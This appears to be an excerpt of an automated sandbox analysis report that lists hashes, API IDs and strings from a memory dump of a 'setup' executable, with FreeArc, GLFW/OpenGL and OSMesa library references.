                                                                                                    • Opcode Fuzzy Hash: d3df98a4ec7ff921d98204493871af92e1d1cfba2bfff53a960de18fe4954fc2
                                                                                                    • Instruction Fuzzy Hash: 35028DB1608B189FD721EF29C48136ABBE1BF84314F56892DEA8C9B301D775D945CF82
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: mallocstrcpy$strlen$_wmkdirstrchr
                                                                                                    • String ID: :/\$@q($Ts;$Ts;$Ts;$freearc%u.tmp$read
                                                                                                    • API String ID: 323131915-3721916319
                                                                                                    • Opcode ID: 296a916f9d4ed23994e7931bb7a2b46274e7f2c4fea6ec42bcfd4dc254934f91
                                                                                                    • Instruction ID: 2f7a69be3c4f7e91c316c83474e5adab307a8ec820c1fdd09e32cebb7fbefbcc
                                                                                                    • Opcode Fuzzy Hash: 296a916f9d4ed23994e7931bb7a2b46274e7f2c4fea6ec42bcfd4dc254934f91
                                                                                                    • Instruction Fuzzy Hash: 1E02A5B49047288FCB61EF68C9857DDBBF0AF49314F0189A9E98CA7341D7749A94CF42
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$Char$exit$_wopenfreelongjmpstrcpy
                                                                                                    • String ID: %s$@q($ERROR: can't alloc %lu memory bytes$ERROR: can't close file %s$ERROR: can't open file %s
                                                                                                    • API String ID: 647301629-909990664
                                                                                                    • Opcode ID: 3ced259a38291337a5502b6b1f72f5481b715bfa7613026b11de29ed59a56280
                                                                                                    • Instruction ID: 6d451fd73cb00b6aa24404a592f5857f502f089d5868a332f23264e79b922959
                                                                                                    • Opcode Fuzzy Hash: 3ced259a38291337a5502b6b1f72f5481b715bfa7613026b11de29ed59a56280
                                                                                                    • Instruction Fuzzy Hash: DD1226B09183158FDB50EF28C58575ABBE0BF48344F1689ADE88C9B356D774D890CF92
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @
                                                                                                    • API String ID: 0-2766056989
                                                                                                    • Opcode ID: e81bb0f8b3d1bfb062a620fa17e5f7958e579c33afe3b219d5b7248a08fc320c
                                                                                                    • Instruction ID: a71fb681b667cb9ee12e9a421a12130f8f2c3f9dfedf115c1125a1f1657e0240
                                                                                                    • Opcode Fuzzy Hash: e81bb0f8b3d1bfb062a620fa17e5f7958e579c33afe3b219d5b7248a08fc320c
                                                                                                    • Instruction Fuzzy Hash: A6B1E3716283469FDB28CF28D480B6ABBE1BF85305F05446CED989B342C374ED59CB96
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$AsyncClientState$ActiveCursorDispatchPeekPropRectScreenTranslateWindow
                                                                                                    • String ID: GLFW
                                                                                                    • API String ID: 1164748732-220981224
                                                                                                    • Opcode ID: 59352d619b58ce2aa5f67df853ab8a99d833dd94aa3a7cbdb67ef4840795e7fd
                                                                                                    • Instruction ID: 561dc1955e977bf6e1943a808313ef06f502185d60f001222548bbd88e9dbc5a
                                                                                                    • Opcode Fuzzy Hash: 59352d619b58ce2aa5f67df853ab8a99d833dd94aa3a7cbdb67ef4840795e7fd
                                                                                                    • Instruction Fuzzy Hash: B7815BB59143448BEB44AF399A4836ABEF1AFC4300F05883EDCC98B245DBF4D459DB82
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$Char$exitlongjmpstrcpy
                                                                                                    • String ID: %s$@q($@q($ERROR: can't alloc %lu memory bytes
                                                                                                    • API String ID: 1574489026-1911585362
                                                                                                    • Opcode ID: 9bdc0f2592242c218ea9af430e4baf23e339343c7f0ff65047f7a87aca9db369
                                                                                                    • Instruction ID: 9839932605d3fac71d2d5de94e4f6ead565ba7af3a642028cadc815e12c17ee0
                                                                                                    • Opcode Fuzzy Hash: 9bdc0f2592242c218ea9af430e4baf23e339343c7f0ff65047f7a87aca9db369
                                                                                                    • Instruction Fuzzy Hash: 25E107B09193049FC751EF68C58535ABBE0AF08304F05887DEE8CAF346D7B898549FA6
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$malloc$_wopenstrcatstrcpystrstr$_filelengthi64_wrename_writestrlen$_closeexitlongjmpstrchrwcschr
                                                                                                    • String ID: :/\$@q($Ts;$Ts;$read
                                                                                                    • API String ID: 3010328184-4128176265
                                                                                                    • Opcode ID: 8c97c92990a20de2af4a2b871d0b11d19bc54dbb2f73813ed409aac6bd12a61b
                                                                                                    • Instruction ID: 002bb7e56750864630651a80d0838f27027ebaa742a1c6323896a6fe515ba88f
                                                                                                    • Opcode Fuzzy Hash: 8c97c92990a20de2af4a2b871d0b11d19bc54dbb2f73813ed409aac6bd12a61b
                                                                                                    • Instruction Fuzzy Hash: 38D1A2B49047288FCB61EF28C9857DDBBF0AF49314F0189E9E988A7341D7749A84CF81
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                    • String ID: OSMesa.dll$OSMesa: Failed to load required entry points$OSMesa: Library not found$OSMesaCreateContextAttribs$OSMesaCreateContextExt$OSMesaDestroyContext$OSMesaGetColorBuffer$OSMesaGetDepthBuffer$OSMesaGetProcAddress$OSMesaMakeCurrent$libOSMesa.dll$C:
                                                                                                    • API String ID: 2449869053-1118952530
                                                                                                    • Opcode ID: 247c2bfdce3bcfbf87e51652bc022dd9698e4786d658098a7c6e475b501146ac
                                                                                                    • Instruction ID: 7ab1e158274fe5f2429b06e8279f4f2686d26086ea308c5a6e5ed657610f3797
                                                                                                    • Opcode Fuzzy Hash: 247c2bfdce3bcfbf87e51652bc022dd9698e4786d658098a7c6e475b501146ac
                                                                                                    • Instruction Fuzzy Hash: 434128B99193459FDB40EF69F98422ABBF0EB45346F04443CE88497255F770C898CF4A
                                                                                                    APIs
                                                                                                      • Part of subcall function 0024A7A0: TlsGetValue.KERNEL32 ref: 0024A7AD
                                                                                                    • strncmp.MSVCRT ref: 0023E976
                                                                                                    • sscanf.MSVCRT ref: 0023E9B4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Valuesscanfstrncmp
                                                                                                    • String ID: %d.%d.%d$Cannot make current with a window that has no OpenGL or OpenGL ES context$Entry point retrieval is useren$GL_ARB_compatibility$GL_ARB_debug_output$GL_ARB_robustness$GL_EXT_robustness$GL_KHR_context_flush_control$No version found in OpenGL ES version string$No version found in OpenGL version string$OpenGL ES $OpenGL ES version string retrieval is useren$OpenGL ES-CL $OpenGL ES-CM $OpenGL version string retrieval is useren$Requested OpenGL ES version %i.%i, got version %i.%i$Requested OpenGL version %i.%i, got version %i.%i$glClear$glGetIntegerv$glGetString$glGetStringi
                                                                                                    • API String ID: 1410306227-46266315
                                                                                                    • Opcode ID: af6ea5b1eb5e4148957ebcfda56401240d7c9bb6b128de523db503ac090674d3
                                                                                                    • Instruction ID: 1ee456897884d395bd5a57007dccb72721355c22d3aba5efa61d56e0f253d2fb
                                                                                                    • Opcode Fuzzy Hash: af6ea5b1eb5e4148957ebcfda56401240d7c9bb6b128de523db503ac090674d3
                                                                                                    • Instruction Fuzzy Hash: 4FE13DB4528301CBDB11AF64D1493AEB7E0BF40304F16887EECC94B296D7B59899CF52
                                                                                                    APIs
                                                                                                    • abort.MSVCRT(?,?,?,00000001,?,?,0025E519), ref: 0033292E
                                                                                                    • abort.MSVCRT(?,?,?,00000001,?,?,0025E519), ref: 00332933
                                                                                                    • abort.MSVCRT(?,?,?,00000001,?,?,0025E519), ref: 00332938
                                                                                                    • abort.MSVCRT(?,?,?,00000001,?,?,0025E519), ref: 0033293D
                                                                                                    • abort.MSVCRT(?,?,?,00000001,?,?,0025E519), ref: 00332942
                                                                                                    • abort.MSVCRT(?,?,?,00000001,?,?,0025E519), ref: 00332947
                                                                                                    • abort.MSVCRT(?,?,?,00000001,?,?,0025E519), ref: 0033294C
                                                                                                    • abort.MSVCRT(?,?,?,00000001,?,?,0025E519), ref: 00332951
                                                                                                    • abort.MSVCRT(?,?,?,00000001,?,?,0025E519), ref: 00332956
                                                                                                    • abort.MSVCRT(?,?,?,00000001,?,?,0025E519), ref: 0033295B
                                                                                                    • abort.MSVCRT(?,?,?,00000001,?,?,0025E519), ref: 00332960
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 00332968
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 0033296D
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 00332972
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 00332977
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 0033297C
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 00332981
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 00332986
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 0033298B
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 00332990
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 00332995
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 0033299C
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 003329A1
                                                                                                    • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,00000004,774CDF20,002776AD), ref: 003329A6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: abort
                                                                                                    • String ID:
                                                                                                    • API String ID: 4206212132-0
                                                                                                    • Opcode ID: 202ebf834efedc974bd8f5fafcbd00723fe1255603d2ed0770ab0a75cabbed2c
                                                                                                    • Instruction ID: f28691b30f8cd2f35f9cc5eb530c82a6c356ce91e9a04b991d03e4e4a8d8bffd
                                                                                                    • Opcode Fuzzy Hash: 202ebf834efedc974bd8f5fafcbd00723fe1255603d2ed0770ab0a75cabbed2c
                                                                                                    • Instruction Fuzzy Hash: 85512931A206159FCB18CF28C4817EDBBF1BF49315F0A8129EDAC9B341D330AA658F85
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
